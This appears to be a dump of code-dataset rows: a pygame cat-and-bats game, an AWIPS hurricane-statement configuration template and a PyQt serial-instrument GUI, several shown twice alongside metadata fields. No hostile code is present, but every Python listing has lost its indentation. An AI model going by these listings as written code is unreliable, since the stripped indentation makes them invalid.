self.image.blit(self.text_render, self.text_pos)
self.text_pos[1] += self.max_height_string
self.rect = self.image.get_rect(topleft=(0, 0))
class Earth(pygame.sprite.Sprite):
def __init__(self, x, y, img):
pygame.sprite.Sprite.__init__(self)
self.images = img
self.index = 0
self.range = len(self.images)
self.image = self.images[self.index]
self.rect = self.image.get_rect(topleft=(int(x), int(y)))
def update(self):
self.rect.x -= SPEED
if self.rect.x <= -WIDTH_WIN:
self.rect.x = WIDTH_WIN
self.index = random.randrange(self.range)
self.image = self.images[self.index]
mask()
class Stars(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.speed = random.randint(1, 2)
self.size = random.randint(1, 3)
self.pos = random.randrange(WIDTH_WIN), random.randrange(HEIGHT_WIN - int(he * .7))
self.image = pygame.Surface((self.size * 2, self.size * 2), pygame.SRCALPHA)
pygame.draw.circle(self.image, pygame.Color(
random.choice(COLOR[238:262])), [self.size, self.size], self.size)
self.rect = self.image.get_rect(center=self.pos)
def update(self):
self.rect.x -= self.speed
if self.rect.right < 0:
self.rect.left = WIDTH_WIN
class Bat(pygame.sprite.Sprite):
def __init__(self, x, y, img):
pygame.sprite.Sprite.__init__(self)
self.images = img
self.time = 0
self.range = len(self.images)
self.image = self.images[self.time]
self.rect = self.image.get_rect(topleft=(x, y))
self.direction = pygame.math.Vector2(self.rect.center)
self.bat_zoom = .4
self.zoom = 0
def update(self):
bat_angle = self.direction.angle_to(cat.position - self.direction)
self.images = [pygame.transform.rotozoom(
image, 180 - bat_angle, self.bat_zoom) for image in images_bat]
self.time += 0.2
self.image = self.images[int(self.time % self.range)]
self.rect = self.image.get_rect(center=self.rect.center)
if self.zoom == 0:
self.bat_zoom += .001
if self.bat_zoom > .7:
self.zoom = 1
elif self.zoom == 1:
self.bat_zoom -= .001
if self.bat_zoom < .4:
self.zoom = 0
class Bat2(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = images_list[3]
self.pos = (WIDTH_WIN * 1.4, WIDTH_WIN * 1.9, HEIGHT_WIN - he)
self.rect = self.image.get_rect(
bottomleft=(random.randint(self.pos[0], self.pos[1]), self.pos[2]))
self.group = pygame.sprite.GroupSingle(self)
self.vel = 0
self.score = 0
def gravi(self):
self.vel += GRAVI if self.rect.left < WIDTH_WIN else 0
self.rect.centery += self.vel
while pygame.sprite.spritecollideany(
self, collideGroup, pygame.sprite.collide_mask):
self.rect.centery -= GRAVI
self.vel = 0
def update(self):
self.gravi()
self.rect.centerx -= SPEED * 2
if self.rect.right < 0:
self.rect.bottomleft = random.randint(self.pos[0], self.pos[1]), self.pos[2]
if pygame.sprite.spritecollideany(
cat, self.group, pygame.sprite.collide_circle_ratio(0.75)):
self.rect.bottomleft = random.randint(self.pos[0], self.pos[1]), self.pos[2]
self.score += 1
class Cat(pygame.sprite.Sprite):
def __init__(self, x, y, img):
pygame.sprite.Sprite.__init__(self)
self.images = img
[self_image.set_colorkey((0, 0, 0)) for self_image in self.images]
self.time = 0
self.range = len(self.images[:-4])
self.range_jump_up = -4
self.range_jump_down = -3
self.range_down = -2
self.range_stop = -1
self.rot = 0
self.image = self.images[self.time]
self.rect = self.image.get_rect(center=(x, y))
self.position = pygame.math.Vector2(self.rect.center)
self.velocity = pygame.math.Vector2()
self.velocity.x = SPEED
self.width = self.image.get_width() // 2
def flip(self):
self.velocity.y = -5
if self.rot > -300:
self.rot -= 10
else:
self.rot = 0
somersault[0] = False
self.images = [pygame.transform.rotate(image, self.rot) for image in images_cat]
def animation(self):
self.time += dt
self.image = self.images[int(self.time % self.range)]
if down[0]:
self.image = self.images[self.range_down]
elif self.velocity.y < 0:
self.image = self.images[self.range_jump_up]
elif self.velocity.y > 4:
self.image = self.images[self.range_jump_down]
elif SPEED == 0:
self.image = self.images[self.range_stop]
def gravitation(self):
self.velocity.y += GRAVI
self.position += self.velocity
def antigravity(self):
# pygame.sprite.collide_mask
while pygame.sprite.spritecollideany(
self, collideGroup, pygame.sprite.collide_rect_ratio(0.97)):
self.position.y -= GRAVI
self.velocity.y = 0
self.rect.centery = int(self.position.y)
if jump[0]:
self.velocity.y = -15
self.velocity.x = 3
else:
self.velocity.x = SPEED
def update(self):
if somersault[0]:
self.flip()
self.animation()
self.image.set_alpha(alpha) # прозрачность изображения
self.gravitation()
if self.position.x > WIDTH_WIN + self.width:
self.position.x = -self.width
self.rect = self.image.get_rect(center=list(map(int, self.position)))
self.antigravity()
'-----------------------------------------------------------------------------'
os.environ['SDL_VIDEO_CENTERED'] = '1'
pygame.init()
WIDTH_WIN, HEIGHT_WIN = 960, 720
DAY_BG_COLOR, NIGHT_BG_COLOR = (100, 0, 255), (5, 0, 50)
screen = pygame.display.set_mode((WIDTH_WIN, HEIGHT_WIN)) # pygame.NOFRAME
pygame.mouse.set_visible(False)
text = pygame.font.SysFont('Arial', 22)
userevent = pygame.USEREVENT
pygame.time.set_timer(userevent, 60000)
key = {
'type_quit': pygame.QUIT,
'type_down': pygame.KEYDOWN,
'type_up': pygame.KEYUP,
'escape': pygame.K_ESCAPE,
'up': pygame.K_UP,
'space': pygame.K_SPACE,
'down': pygame.K_DOWN,
'right': pygame.K_RIGHT,
'left': pygame.K_LEFT,
'c': pygame.K_c,
'z': pygame.K_z,
'x': pygame.K_x,
'm': pygame.K_m
}
FPS = 60
clock = pygame.time.Clock()
alpha = 255
jump = [False]
down = [False]
somersault = [False]
menu_on_off = [True, False]
day_night = [False, True]
WHITE = (255, 255, 255)
SPEED = 0
GRAVI = 1
NUMBER_OF_STARS = 150
COLOR_CAT = ['red', 'green', 'royal blue', 'orange', 'olive drab', 'sienna4']
images_list = []
load_images('Images')
images_list[1] = images_list[1].convert() # для установки прозрачности
images_cat = []
images_bat = []
with open('texture.txt') as f:
for lines in f:
line = ast.literal_eval(lines)
if 'cat' in line.keys():
X, Y, W, h = line[str(*line.keys())].values()
for n, w in enumerate(W):
images_cat.append(images_list[1].subsurface((X[n], Y[n], w, h)))
elif 'bat' in line.keys():
X, Y, W, h = line[str(*line.keys())].values()
for n, w in enumerate(W):
images_bat.append(images_list[0].subsurface((X[n], Y[n], w, h)))
height_bat = h
we, he = images_list[2].get_width() // 2, images_list[2].get_height() // 2
images_earth = [
images_list[2].subsurface((0, 0, we, he)),
images_list[2].subsurface((we, 0, we, he)),
images_list[2].subsurface((0, he, we, he)),
images_list[2].subsurface((we, he, we, he))
]
menu = Menu()
cat = Cat(WIDTH_WIN // 2, HEIGHT_WIN // 2, images_cat)
bat = Bat(WIDTH_WIN - height_bat, 0, images_bat)
bat2 = Bat2()
earth1 = Earth(0, HEIGHT_WIN - he, images_earth)
earth2 = Earth(WIDTH_WIN, HEIGHT_WIN - he, images_earth)
sprites = pygame.sprite.LayeredUpdates()
sprites.add(earth1, earth2, layer=1)
sprites.add(menu, layer=2)
sprites.add(bat, layer=2)
sprites.add(cat, bat2, layer=3)
collideGroup = pygame.sprite.Group(earth1, earth2)
for _ in range(NUMBER_OF_STARS):
stars = Stars()
sprites.add(stars, layer=0)
stars_list = sprites.remove_sprites_of_layer(0)
obj = [pygame.Surface((200, 20), pygame.SRCALPHA)]
obj[0].fill((200, 200, 20, 255))
objW, objH = obj[0].get_width(), obj[0].get_height()
for i in range(3):
obj_sprite = Earth(WIDTH_WIN + objW * i, HEIGHT_WIN / 2.2 - objH * i * 3, obj)
sprites.add(obj_sprite, layer=1)
collideGroup.add(obj_sprite)
obj_sprite = sprites.get_sprites_from_layer(1)[-1]
collideColor = images_list[2].get_at((30, 30))
mask()
run = True
while run:
dt = clock.tick(FPS) / 150.
for e in pygame.event.get():
if e.type == key['type_quit']:
run = False
elif e.type == userevent:
day_night.reverse()
if day_night[0]:
sprites.add(stars_list, layer=0)
elif not day_night[0]:
sprites.remove_sprites_of_layer(0)
elif e.type == key['type_down']:
if e.key == key['escape']:
run = False
elif e.key == key['up']:
jump[0] = True
elif e.key == key['space']:
somersault[0] = True
elif e.key == key['down']:
down[0] = True
elif e.key == key['right']:
SPEED = 1
elif e.key == key['left']:
SPEED = 0
elif e.key == key['c'] and not somersault[0]:
clr = random.choice(COLOR_CAT) # цвет кота
for c, cat_color in enumerate(cat.images):
originalColor = cat_color.get_at((90, 108 if c == 10 else 40))
ar = pygame.PixelArray(cat_color)
ar.replace(originalColor, pygame.Color(clr), 0.1)
del ar
images_cat = cat.images
elif e.key == key['z']:
alpha -= 25 if alpha > 5 else 5 if alpha > 0 else 0
elif e.key == key['x']:
alpha += 25 if alpha < 250 else 5 if alpha < 255 else 0
elif e.key == key['m']:
menu_on_off.reverse()
if menu_on_off[0]:
sprites.add(menu, layer=2)
elif not menu_on_off[0]:
sprites.remove(menu)
elif e.type == key['type_up']:
if e.key == key['down'] or e.key == key['up']:
down[0] = False
jump[0] = False
if obj_sprite.rect.right == 0:
obj_sprite.image.fill(pygame.Color(random.choice(COLOR)))
sprites.update()
screen.fill(NIGHT_BG_COLOR if day_night[0] else DAY_BG_COLOR)
screen.blit(
text.render(f'{bat2.score}', True, WHITE, None), (WIDTH_WIN // 2, 5))
sprites.draw(screen)
pygame.display.update()
pygame.display.set_caption(f'CAT FPS: {int(clock.get_fps())}')
sys.exit(0)
|
import pygame
import os
import sys
import random
import ast
from colors import COLOR
def load_images(path) -> list:
for file_name in os.listdir(path):
images_list.append(pygame.image.load(path + os.sep + file_name))
def mask():
for sp in collideGroup:
# collideColor = sp.image.get_at((30, 15))
sp.mask = pygame.mask.from_threshold(sp.image, collideColor, (1, 1, 1, 255))
class Menu(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.text_list = [
'space - somersault', 'm - menu', 'c - color selection',
'z - -transparency', 'x - +transparency',
'↓ - to lie', '↑ - jamp', '→ - go', '← - stop']
self.text_pos = [10, 0]
self.width_string = []
for string in self.text_list:
self.width_string.append(text.size(string)[0])
self.max_width_string = max(self.width_string)
self.max_height_string = text.get_height() + text.get_descent()
self.top = text.get_height() - text.get_ascent()
self.image = pygame.Surface((
self.text_pos[0] + self.max_width_string,
self.text_pos[1] + self.top + len(self.text_list) * self.max_height_string),
flags=pygame.SRCALPHA)
for txt in self.text_list:
self.text_render = text.render(txt, True, WHITE, None)
self.image.blit(self.text_render, self.text_pos)
self.text_pos[1] += self.max_height_string
self.rect = self.image.get_rect(topleft=(0, 0))
class Earth(pygame.sprite.Sprite):
def __init__(self, x, y, img):
pygame.sprite.Sprite.__init__(self)
self.images = img
self.index = 0
self.range = len(self.images)
self.image = self.images[self.index]
self.rect = self.image.get_rect(topleft=(int(x), int(y)))
def update(self):
self.rect.x -= SPEED
if self.rect.x <= -WIDTH_WIN:
self.rect.x = WIDTH_WIN
self.index = random.randrange(self.range)
self.image = self.images[self.index]
mask()
class Stars(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.speed = random.randint(1, 2)
self.size = random.randint(1, 3)
self.pos = random.randrange(WIDTH_WIN), random.randrange(HEIGHT_WIN - int(he * .7))
self.image = pygame.Surface((self.size * 2, self.size * 2), pygame.SRCALPHA)
pygame.draw.circle(self.image, pygame.Color(
random.choice(COLOR[238:262])), [self.size, self.size], self.size)
self.rect = self.image.get_rect(center=self.pos)
def update(self):
self.rect.x -= self.speed
if self.rect.right < 0:
self.rect.left = WIDTH_WIN
class Bat(pygame.sprite.Sprite):
def __init__(self, x, y, img):
pygame.sprite.Sprite.__init__(self)
self.images = img
self.time = 0
self.range = len(self.images)
self.image = self.images[self.time]
self.rect = self.image.get_rect(topleft=(x, y))
self.direction = pygame.math.Vector2(self.rect.center)
self.bat_zoom = .4
self.zoom = 0
def update(self):
bat_angle = self.direction.angle_to(cat.position - self.direction)
self.images = [pygame.transform.rotozoom(
image, 180 - bat_angle, self.bat_zoom) for image in images_bat]
self.time += 0.2
self.image = self.images[int(self.time % self.range)]
self.rect = self.image.get_rect(center=self.rect.center)
if self.zoom == 0:
self.bat_zoom += .001
if self.bat_zoom > .7:
self.zoom = 1
elif self.zoom == 1:
self.bat_zoom -= .001
if self.bat_zoom < .4:
self.zoom = 0
class Bat2(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = images_list[3]
self.pos = (WIDTH_WIN * 1.4, WIDTH_WIN * 1.9, HEIGHT_WIN - he)
self.rect = self.image.get_rect(
bottomleft=(random.randint(self.pos[0], self.pos[1]), self.pos[2]))
self.group = pygame.sprite.GroupSingle(self)
self.vel = 0
self.score = 0
def gravi(self):
self.vel += GRAVI if self.rect.left < WIDTH_WIN else 0
self.rect.centery += self.vel
while pygame.sprite.spritecollideany(
self, collideGroup, pygame.sprite.collide_mask):
self.rect.centery -= GRAVI
self.vel = 0
def update(self):
self.gravi()
self.rect.centerx -= SPEED * 2
if self.rect.right < 0:
self.rect.bottomleft = random.randint(self.pos[0], self.pos[1]), self.pos[2]
if pygame.sprite.spritecollideany(
cat, self.group, pygame.sprite.collide_circle_ratio(0.75)):
self.rect.bottomleft = random.randint(self.pos[0], self.pos[1]), self.pos[2]
self.score += 1
class Cat(pygame.sprite.Sprite):
def __init__(self, x, y, img):
pygame.sprite.Sprite.__init__(self)
self.images = img
[self_image.set_colorkey((0, 0, 0)) for self_image in self.images]
self.time = 0
self.range = len(self.images[:-4])
self.range_jump_up = -4
self.range_jump_down = -3
self.range_down = -2
self.range_stop = -1
self.rot = 0
self.image = self.images[self.time]
self.rect = self.image.get_rect(center=(x, y))
self.position = pygame.math.Vector2(self.rect.center)
self.velocity = pygame.math.Vector2()
self.velocity.x = SPEED
self.width = self.image.get_width() // 2
def flip(self):
self.velocity.y = -5
if self.rot > -300:
self.rot -= 10
else:
self.rot = 0
somersault[0] = False
self.images = [pygame.transform.rotate(image, self.rot) for image in images_cat]
def animation(self):
self.time += dt
self.image = self.images[int(self.time % self.range)]
if down[0]:
self.image = self.images[self.range_down]
elif self.velocity.y < 0:
self.image = self.images[self.range_jump_up]
elif self.velocity.y > 4:
self.image = self.images[self.range_jump_down]
elif SPEED == 0:
self.image = self.images[self.range_stop]
def gravitation(self):
self.velocity.y += GRAVI
self.position += self.velocity
def antigravity(self):
# pygame.sprite.collide_mask
while pygame.sprite.spritecollideany(
self, collideGroup, pygame.sprite.collide_rect_ratio(0.97)):
self.position.y -= GRAVI
self.velocity.y = 0
self.rect.centery = int(self.position.y)
if jump[0]:
self.velocity.y = -15
self.velocity.x = 3
else:
self.velocity.x = SPEED
def update(self):
if somersault[0]:
self.flip()
self.animation()
self.image.set_alpha(alpha) # прозрачность изображения
self.gravitation()
if self.position.x > WIDTH_WIN + self.width:
self.position.x = -self.width
self.rect = self.image.get_rect(center=list(map(int, self.position)))
self.antigravity()
'-----------------------------------------------------------------------------'
os.environ['SDL_VIDEO_CENTERED'] = '1'
pygame.init()
WIDTH_WIN, HEIGHT_WIN = 960, 720
DAY_BG_COLOR, NIGHT_BG_COLOR = (100, 0, 255), (5, 0, 50)
screen = pygame.display.set_mode((WIDTH_WIN, HEIGHT_WIN)) # pygame.NOFRAME
pygame.mouse.set_visible(False)
text = pygame.font.SysFont('Arial', 22)
userevent = pygame.USEREVENT
pygame.time.set_timer(userevent, 60000)
key = {
'type_quit': pygame.QUIT,
'type_down': pygame.KEYDOWN,
'type_up': pygame.KEYUP,
'escape': pygame.K_ESCAPE,
'up': pygame.K_UP,
'space': pygame.K_SPACE,
'down': pygame.K_DOWN,
'right': pygame.K_RIGHT,
'left': pygame.K_LEFT,
'c': pygame.K_c,
'z': pygame.K_z,
'x': pygame.K_x,
'm': pygame.K_m
}
FPS = 60
clock = pygame.time.Clock()
alpha = 255
jump = [False]
down = [False]
somersault = [False]
menu_on_off = [True, False]
day_night = [False, True]
WHITE = (255, 255, 255)
SPEED = 0
GRAVI = 1
NUMBER_OF_STARS = 150
COLOR_CAT = ['red', 'green', 'royal blue', 'orange', 'olive drab', 'sienna4']
images_list = []
load_images('Images')
images_list[1] = images_list[1].convert() # для установки прозрачности
images_cat = []
images_bat = []
with open('texture.txt') as f:
for lines in f:
line = ast.literal_eval(lines)
if 'cat' in line.keys():
X, Y, W, h = line[str(*line.keys())].values()
for n, w in enumerate(W):
images_cat.append(images_list[1].subsurface((X[n], Y[n], w, h)))
elif 'bat' in line.keys():
X, Y, W, h = line[str(*line.keys())].values()
for n, w in enumerate(W):
images_bat.append(images_list[0].subsurface((X[n], Y[n], w, h)))
height_bat = h
we, he = images_list[2].get_width() // 2, images_list[2].get_height() // 2
images_earth = [
images_list[2].subsurface((0, 0, we, he)),
images_list[2].subsurface((we, 0, we, he)),
images_list[2].subsurface((0, he, we, he)),
images_list[2].subsurface((we, he, we, he))
]
menu = Menu()
cat = Cat(WIDTH_WIN // 2, HEIGHT_WIN // 2, images_cat)
bat = Bat(WIDTH_WIN - height_bat, 0, images_bat)
bat2 = Bat2()
earth1 = Earth(0, HEIGHT_WIN - he, images_earth)
earth2 = Earth(WIDTH_WIN, HEIGHT_WIN - he, images_earth)
sprites = pygame.sprite.LayeredUpdates()
sprites.add(earth1, earth2, layer=1)
sprites.add(menu, layer=2)
sprites.add(bat, layer=2)
sprites.add(cat, bat2, layer=3)
collideGroup = pygame.sprite.Group(earth1, earth2)
for _ in range(NUMBER_OF_STARS):
stars = Stars()
sprites.add(stars, layer=0)
stars_list = sprites.remove_sprites_of_layer(0)
obj = [pygame.Surface((200, 20), pygame.SRCALPHA)]
obj[0].fill((200, 200, 20, 255))
objW, objH = obj[0].get_width(), obj[0].get_height()
for i in range(3):
obj_sprite = Earth(WIDTH_WIN + objW * i, HEIGHT_WIN / 2.2 - objH * i * 3, obj)
sprites.add(obj_sprite, layer=1)
collideGroup.add(obj_sprite)
obj_sprite = sprites.get_sprites_from_layer(1)[-1]
collideColor = images_list[2].get_at((30, 30))
mask()
run = True
while run:
dt = clock.tick(FPS) / 150.
for e in pygame.event.get():
if e.type == key['type_quit']:
run = False
elif e.type == userevent:
day_night.reverse()
if day_night[0]:
sprites.add(stars_list, layer=0)
elif not day_night[0]:
sprites.remove_sprites_of_layer(0)
elif e.type == key['type_down']:
if e.key == key['escape']:
run = False
elif e.key == key['up']:
jump[0] = True
elif e.key == key['space']:
somersault[0] = True
elif e.key == key['down']:
down[0] = True
elif e.key == key['right']:
SPEED = 1
elif e.key == key['left']:
SPEED = 0
elif e.key == key['c'] and not somersault[0]:
clr = random.choice(COLOR_CAT) # цвет кота
for c, cat_color in enumerate(cat.images):
originalColor = cat_color.get_at((90, 108 if c == 10 else 40))
ar = pygame.PixelArray(cat_color)
ar.replace(originalColor, pygame.Color(clr), 0.1)
del ar
images_cat = cat.images
elif e.key == key['z']:
alpha -= 25 if alpha > 5 else 5 if alpha > 0 else 0
elif e.key == key['x']:
alpha += 25 if alpha < 250 else 5 if alpha < 255 else 0
elif e.key == key['m']:
menu_on_off.reverse()
if menu_on_off[0]:
sprites.add(menu, layer=2)
elif not menu_on_off[0]:
sprites.remove(menu)
elif e.type == key['type_up']:
if e.key == key['down'] or e.key == key['up']:
down[0] = False
jump[0] = False
if obj_sprite.rect.right == 0:
obj_sprite.image.fill(pygame.Color(random.choice(COLOR)))
sprites.update()
screen.fill(NIGHT_BG_COLOR if day_night[0] else DAY_BG_COLOR)
screen.blit(
text.render(f'{bat2.score}', True, WHITE, None), (WIDTH_WIN // 2, 5))
sprites.draw(screen)
pygame.display.update()
pygame.display.set_caption(f'CAT FPS: {int(clock.get_fps())}')
sys.exit(0)
|
ru
| 0.829995
|
# collideColor = sp.image.get_at((30, 15)) # pygame.sprite.collide_mask # прозрачность изображения # pygame.NOFRAME # для установки прозрачности # цвет кота
| 2.641851
| 3
|
edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/utility/Hazard_HLS_Site_MultiPil_Definition.py
|
srcarter3/awips2
| 0
|
6628535
|
<reponame>srcarter3/awips2
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: <NAME>
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
# ---------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without
# technical support, and with no warranty, express or implied, as to
# its usefulness for any purpose.
#
# Hazard_HLS_<site>_<MultiPil>_Definition.TextUtility
#
# This file sets up all the Product Definition overrides for the
# Hazard_HLS formatter for a site.
#
# ---------------------------------------------------------------------
#**********************************************************************
# MAKE NO CHANGES HERE
# The minimum content of this file is the following Definition statement
Definition = {}
# End MAKE NO CHANGES HERE
#**********************************************************************
#####################################################
# Override VariableList if desired
#
#VariableList = []
#----- WFO <site> Hazard_HLS Definition -----
# Definition Statements must start in column 1.
# REQUIRED CONFIGURATION ITEMS
#Definition['displayName'] = None
Definition['displayName'] = "Hazard_HLS_<MultiPil> (Hurricane Local Statement)"
# Header configuration items
Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter)
Definition["wmoID"] = "<wmoID>" # WMO ID
Definition["pil"] = "<pil>" # product pil
Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database.
Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN.
Definition["outputFile"] = "{prddir}/TEXT/Hazard_HLS_<MultiPil>.txt"
# OPTIONAL CONFIGURATION ITEMS
#Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC"
#Definition["debug"] = 1
|
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: <NAME>
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
# ---------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without
# technical support, and with no warranty, express or implied, as to
# its usefulness for any purpose.
#
# Hazard_HLS_<site>_<MultiPil>_Definition.TextUtility
#
# This file sets up all the Product Definition overrides for the
# Hazard_HLS formatter for a site.
#
# ---------------------------------------------------------------------
#**********************************************************************
# MAKE NO CHANGES HERE
# The minimum content of this file is the following Definition statement
Definition = {}
# End MAKE NO CHANGES HERE
#**********************************************************************
#####################################################
# Override VariableList if desired
#
#VariableList = []
#----- WFO <site> Hazard_HLS Definition -----
# Definition Statements must start in column 1.
# REQUIRED CONFIGURATION ITEMS
#Definition['displayName'] = None
Definition['displayName'] = "Hazard_HLS_<MultiPil> (Hurricane Local Statement)"
# Header configuration items
Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter)
Definition["wmoID"] = "<wmoID>" # WMO ID
Definition["pil"] = "<pil>" # product pil
Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database.
Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN.
Definition["outputFile"] = "{prddir}/TEXT/Hazard_HLS_<MultiPil>.txt"
# OPTIONAL CONFIGURATION ITEMS
#Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC"
#Definition["debug"] = 1
|
en
| 0.669679
|
## # This software was developed and / or modified by Raytheon Company, # pursuant to Contract DG133W-05-CQ-1067 with the US Government. # # U.S. EXPORT CONTROLLED TECHNICAL DATA # This software product contains export-restricted data whose # export/transfer/disclosure is restricted by U.S. law. Dissemination # to non-U.S. persons whether in the United States or abroad requires # an export license or other authorization. # # Contractor Name: <NAME> # Contractor Address: 6825 Pine Street, Suite 340 # Mail Stop B8 # Omaha, NE 68106 # 402.291.0100 # # See the AWIPS II Master Rights File ("Master Rights File.pdf") for # further licensing information. ## ## # This is a base file that is not intended to be overridden. ## # --------------------------------------------------------------------- # This software is in the public domain, furnished "as is", without # technical support, and with no warranty, express or implied, as to # its usefulness for any purpose. # # Hazard_HLS_<site>_<MultiPil>_Definition.TextUtility # # This file sets up all the Product Definition overrides for the # Hazard_HLS formatter for a site. # # --------------------------------------------------------------------- #********************************************************************** # MAKE NO CHANGES HERE # The minimum content of this file is the following Definition statement # End MAKE NO CHANGES HERE #********************************************************************** ##################################################### # Override VariableList if desired # #VariableList = [] #----- WFO <site> Hazard_HLS Definition ----- # Definition Statements must start in column 1. # REQUIRED CONFIGURATION ITEMS #Definition['displayName'] = None # Header configuration items # full station identifier (4letter) # WMO ID # product pil # Product ID for storing to AWIPS text database. # Product ID for transmitting to AWIPS WAN. # OPTIONAL CONFIGURATION ITEMS #Definition["database"] = "Official" # Source database. "Official", "Fcst", or "ISC" #Definition["debug"] = 1
| 1.102941
| 1
|
GUI/app.py
|
joshuamitchell192/DLS_Project
| 1
|
6628536
|
import configparser
import os
import sys
import threading
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication
from Controllers.controller import Controller
from Models.instructions import Instructions
from Models.sampleData import SampleData
from Services.serialConnection import SerialConnection
from Views.mainView import View
class App (QApplication):
def __init__(self, sys_argv):
super(App, self).__init__(sys_argv)
self.absoluteInstallationPath = os.path.dirname(os.path.abspath(__file__))
self.sampleData = SampleData()
port = self.loadConfigComPort()
self.serialConnection = SerialConnection(port)
self.controller = Controller(self.serialConnection, Instructions, self.sampleData)
self.view = View(self.serialConnection, self.controller, self.sampleData)
self.view.show()
thread = threading.Thread(target=self.controller.readLoop, args=())
# probably should use an signalling mechanism like an Event to stop gracefully
thread.daemon = True
thread.start()
self.loadConfig()
self.view.calculateExpectedDuration()
def loadConfigComPort(self):
config = configparser.ConfigParser()
config.read(self.absoluteInstallationPath + '/settings.ini')
if ('Default' in config):
if ('Port' in config['Default']):
return config['Default']['Port']
return ""
def loadConfig(self):
config = configparser.ConfigParser()
config.read(self.absoluteInstallationPath + '/settings.ini')
if ('Default' in config):
defaultSettings = config['Default']
if ("SampleDuration" in defaultSettings):
self.view.SmpDuration_SpinBox.setValue(float(defaultSettings['SampleDuration']))
else:
print("Failed to load 'SampleDuration' from 'Default' section from settings")
if ("mmBetweenSamples" in defaultSettings):
self.view.StepLength_LineEdit.setValue(float(defaultSettings['mmBetweenSamples']))
if ("StartPosition" in defaultSettings):
self.view.P1_Slider.setValue(int(defaultSettings["StartPosition"]))
self.view.P1_SpinBox.setValue(int(defaultSettings["StartPosition"]))
if ("EndPosition" in defaultSettings):
self.view.P2_Slider.setValue(int(defaultSettings["EndPosition"]))
self.view.P2_SpinBox.setValue(int(defaultSettings["EndPosition"]))
if ("AverageInterval" in defaultSettings):
self.view.AvgInterval_SpinBox.setValue(int(defaultSettings["AverageInterval"]))
if __name__ == '__main__':
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QApplication.setAttribute(Qt.AA_EnableHighDpiScaling, True)
QApplication.setAttribute(Qt.AA_DisableWindowContextHelpButton)
QApplication.setAttribute(Qt.AA_UseStyleSheetPropagationInWidgetStyles, True)
app = App(sys.argv)
dirname = os.path.dirname(os.path.abspath(__file__))
ssFile = os.path.join(dirname, "stylesheet.qss")
dropDownPath = os.path.join(dirname, "Assets/baseline_arrow_drop_down_black_18dp.png").replace('\\', '/')
with open(ssFile) as fh:
styleSheet = fh.read()
styleSheet += """
QComboBox::down-arrow {
image: url(""" + dropDownPath + """);
}
"""
app.setStyleSheet(styleSheet)
sys.exit(app.exec_())
|
import configparser
import os
import sys
import threading
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication
from Controllers.controller import Controller
from Models.instructions import Instructions
from Models.sampleData import SampleData
from Services.serialConnection import SerialConnection
from Views.mainView import View
class App (QApplication):
def __init__(self, sys_argv):
super(App, self).__init__(sys_argv)
self.absoluteInstallationPath = os.path.dirname(os.path.abspath(__file__))
self.sampleData = SampleData()
port = self.loadConfigComPort()
self.serialConnection = SerialConnection(port)
self.controller = Controller(self.serialConnection, Instructions, self.sampleData)
self.view = View(self.serialConnection, self.controller, self.sampleData)
self.view.show()
thread = threading.Thread(target=self.controller.readLoop, args=())
# probably should use an signalling mechanism like an Event to stop gracefully
thread.daemon = True
thread.start()
self.loadConfig()
self.view.calculateExpectedDuration()
def loadConfigComPort(self):
config = configparser.ConfigParser()
config.read(self.absoluteInstallationPath + '/settings.ini')
if ('Default' in config):
if ('Port' in config['Default']):
return config['Default']['Port']
return ""
def loadConfig(self):
config = configparser.ConfigParser()
config.read(self.absoluteInstallationPath + '/settings.ini')
if ('Default' in config):
defaultSettings = config['Default']
if ("SampleDuration" in defaultSettings):
self.view.SmpDuration_SpinBox.setValue(float(defaultSettings['SampleDuration']))
else:
print("Failed to load 'SampleDuration' from 'Default' section from settings")
if ("mmBetweenSamples" in defaultSettings):
self.view.StepLength_LineEdit.setValue(float(defaultSettings['mmBetweenSamples']))
if ("StartPosition" in defaultSettings):
self.view.P1_Slider.setValue(int(defaultSettings["StartPosition"]))
self.view.P1_SpinBox.setValue(int(defaultSettings["StartPosition"]))
if ("EndPosition" in defaultSettings):
self.view.P2_Slider.setValue(int(defaultSettings["EndPosition"]))
self.view.P2_SpinBox.setValue(int(defaultSettings["EndPosition"]))
if ("AverageInterval" in defaultSettings):
self.view.AvgInterval_SpinBox.setValue(int(defaultSettings["AverageInterval"]))
if __name__ == '__main__':
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
